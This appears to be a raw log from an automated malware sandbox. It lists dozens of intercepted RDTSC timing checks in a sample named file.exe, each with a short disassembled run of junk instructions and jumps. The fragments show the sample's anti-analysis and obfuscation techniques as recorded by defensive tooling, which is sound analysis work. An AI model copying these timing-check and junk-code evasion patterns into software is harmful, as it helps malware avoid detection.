Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C775 second address: 123C784 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCC24D21136h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C784 second address: 123C793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jl 00007FCC24F8725Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C367 second address: 123C371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C371 second address: 123C379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A2CB second address: 124A2D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FCC24D21136h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A2D5 second address: 124A2E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jbe 00007FCC24F87256h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A17F second address: 124A18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1259451 second address: 1259455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1259455 second address: 125946F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21146h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125946F second address: 125949E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FCC24F87256h 0x0000000d jmp 00007FCC24F8725Bh 0x00000012 jmp 00007FCC24F8725Bh 0x00000017 popad 0x00000018 pop ecx 0x00000019 push esi 0x0000001a pushad 0x0000001b jno 00007FCC24F87256h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12592DF second address: 1259303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCC24D2113Ah 0x0000000b popad 0x0000000c jmp 00007FCC24D21143h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1259303 second address: 1259308 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C295 second address: 125C29A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C29A second address: 125C2D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F87265h 0x00000007 jl 00007FCC24F87262h 0x0000000d jns 00007FCC24F87256h 0x00000013 jnc 00007FCC24F87256h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jmp 00007FCC24F8725Dh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C2D6 second address: 125C2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C2DC second address: 125C316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jp 00007FCC24F87256h 0x0000000c jmp 00007FCC24F87262h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FCC24F87269h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C316 second address: 125C320 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCC24D21136h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125BE55 second address: 125BE5B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125BE5B second address: 125BE61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125BE61 second address: 125BE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24F87264h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125BE79 second address: 125BE85 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125BE85 second address: 125BE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125BFF1 second address: 125BFFD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125BFFD second address: 125C00E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCC24F8725Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1275453 second address: 1275457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1275457 second address: 1275460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1275460 second address: 127547C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24D21147h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127547C second address: 127548C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCC24F87262h 0x00000008 ja 00007FCC24F87256h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1274788 second address: 127478C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127478C second address: 1274790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1274790 second address: 12747CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FCC24D2113Ah 0x0000000c popad 0x0000000d jl 00007FCC24D21169h 0x00000013 jo 00007FCC24D2113Ch 0x00000019 jc 00007FCC24D21136h 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007FCC24D21136h 0x00000027 jmp 00007FCC24D2113Fh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1274D51 second address: 1274D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1274D56 second address: 1274D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1274D60 second address: 1274D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jns 00007FCC24F87256h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FCC24F87256h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1274D7C second address: 1274D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1275035 second address: 127503B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127503B second address: 1275056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCC24D21140h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1275056 second address: 127506A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F87260h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279612 second address: 1279618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279618 second address: 127961D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12796AB second address: 12796B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12796B1 second address: 1279700 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a jmp 00007FCC24F8725Fh 0x0000000f pop eax 0x00000010 nop 0x00000011 sub dword ptr [ebp+122D1DD3h], esi 0x00000017 push 00000004h 0x00000019 sub dword ptr [ebp+122D2F97h], edi 0x0000001f jno 00007FCC24F87258h 0x00000025 push 9C0C0E85h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FCC24F87267h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12798F9 second address: 12798FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279988 second address: 127998C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C3CA second address: 127C3D4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCC24D21136h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C3D4 second address: 127C3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FCC24F8725Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127E4A9 second address: 127E4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127E4B1 second address: 127E4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FCC24F87256h 0x0000000e jp 00007FCC24F87256h 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0E6B second address: 4FE0E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0E6F second address: 4FE0E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0E73 second address: 4FE0E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0E79 second address: 4FE0EB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F87264h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCC24F8725Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCC24F87265h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0EB5 second address: 4FE0EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21141h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FCC24D2113Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCC24D2113Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0EE9 second address: 4FE0EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010D51 second address: 5010D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, B8h 0x00000005 call 00007FCC24D21140h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FCC24D2113Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010D7B second address: 5010D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010D81 second address: 5010D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010D85 second address: 5010D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010D89 second address: 5010DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FCC24D21149h 0x0000000f pop ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB00E1 second address: 4FB01C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, dx 0x00000007 popad 0x00000008 call 00007FCC24F8725Fh 0x0000000d mov dx, cx 0x00000010 pop eax 0x00000011 popad 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FCC24F8725Eh 0x0000001a add esi, 179A4D38h 0x00000020 jmp 00007FCC24F8725Bh 0x00000025 popfd 0x00000026 push esi 0x00000027 pushfd 0x00000028 jmp 00007FCC24F8725Fh 0x0000002d xor cx, F2FEh 0x00000032 jmp 00007FCC24F87269h 0x00000037 popfd 0x00000038 pop eax 0x00000039 popad 0x0000003a mov dword ptr [esp], ebp 0x0000003d jmp 00007FCC24F87267h 0x00000042 mov ebp, esp 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007FCC24F87264h 0x0000004b and ah, 00000058h 0x0000004e jmp 00007FCC24F8725Bh 0x00000053 popfd 0x00000054 call 00007FCC24F87268h 0x00000059 jmp 00007FCC24F87262h 0x0000005e pop ecx 0x0000005f popad 0x00000060 push dword ptr [ebp+04h] 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB01C8 second address: 4FB01CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB01CE second address: 4FB01D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB01D4 second address: 4FB01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0235 second address: 4FB0245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCC24F8725Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD0AB8 second address: 4FD0ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21141h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d movzx eax, dx 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD0ADD second address: 4FD0AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD0AE1 second address: 4FD0AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD06FB second address: 4FD0701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD0701 second address: 4FD0705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD045B second address: 4FD046A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F8725Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD046A second address: 4FD0470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FD0470 second address: 4FD0474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE001B second address: 4FE0053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21149h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FCC24D21143h 0x00000012 pop ecx 0x00000013 push edi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0053 second address: 4FE005A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE005A second address: 4FE009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 movsx ebx, si 0x0000000c pushfd 0x0000000d jmp 00007FCC24D21142h 0x00000012 sbb ch, FFFFFFC8h 0x00000015 jmp 00007FCC24D2113Bh 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007FCC24D2113Bh 0x00000025 pop ecx 0x00000026 push ebx 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE009C second address: 4FE00A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE00A2 second address: 4FE00A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE00A6 second address: 4FE00AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE00AA second address: 4FE00D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FCC24D21148h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE00D3 second address: 4FE00D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE00D7 second address: 4FE00F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21149h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE00F4 second address: 4FE00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE00FA second address: 4FE00FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010D0A second address: 5010D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010D10 second address: 5010D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF0180 second address: 4FF01AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F87269h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCC24F8725Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0DAB second address: 4FE0DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0DAF second address: 4FE0DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0DB5 second address: 4FE0DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0DBB second address: 4FE0DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50102F5 second address: 501035D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FCC24D21144h 0x00000011 sub eax, 03ED81E8h 0x00000017 jmp 00007FCC24D2113Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FCC24D21148h 0x00000023 jmp 00007FCC24D21145h 0x00000028 popfd 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501035D second address: 501037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24F87268h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501037A second address: 50103A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D2113Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCC24D21145h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50103A1 second address: 50103B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCC24F8725Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50103B1 second address: 50103B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
